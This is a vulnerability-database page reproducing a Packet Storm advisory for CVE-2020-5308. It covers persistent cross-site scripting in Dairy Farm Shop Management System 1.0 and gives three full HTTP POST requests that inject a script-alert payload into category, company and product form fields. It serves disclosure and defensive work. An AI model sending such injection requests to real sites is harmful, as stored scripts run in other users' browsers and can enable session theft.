Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormChris InzingaPACKETSTORM:155861
HistoryJan 07, 2020 - 12:00 a.m.

Dairy Farm Shop Management System 1.0 Cross Site Scripting

2020-01-0700:00:00
Chris Inzinga
packetstormsecurity.com
142

EPSS

0.016

Percentile

87.5%

JSON
`# Exploit Title: Dairy Farm Shop Management System v1.0 - Persistent Cross-Site Scripting  
# Google Dork: N/A  
# Date: 2020-01-03  
# Exploit Author: Chris Inzinga  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/  
# Version: v1.0  
# Tested on: Windows  
# CVE: CVE-2020-5308  
  
================ 1. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-category.php  
Method: POST  
Parameter(s): 'category' & 'categorycode'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-category.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-category.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&categorycode=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 2. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-company.php  
Method: POST  
Parameter(s): 'companyname'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-company.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-company.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 59  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
companyname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 3. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-product.php  
Method: POST  
Parameter(s): 'productname'  
Payload: <script>alert(1)</script>  
  
POST /dfsms/add-product.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-product.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 101  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=test&company=test&productname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&productprice=1&submit=  
  
  
  
`

Related

cvelist 1
cve 1
prion 1
nvd 1
attackerkb 1
cvelist
cvelist
CVE-2020-5308
2020-01-09 12:15:18
cve
cve
CVE-2020-5308
2020-01-09 13:15:11
prion
prion
Design/Logic Flaw
2020-01-09 13:15:00
nvd
nvd
CVE-2020-5308
2020-01-09 13:15:11
attackerkb
attackerkb
CVE-2020-5308
2020-01-07 00:00:00

EPSS

0.016

Percentile

87.5%

JSON
Related for PACKETSTORM:155861
cvelist1cve1prion1nvd1attackerkb1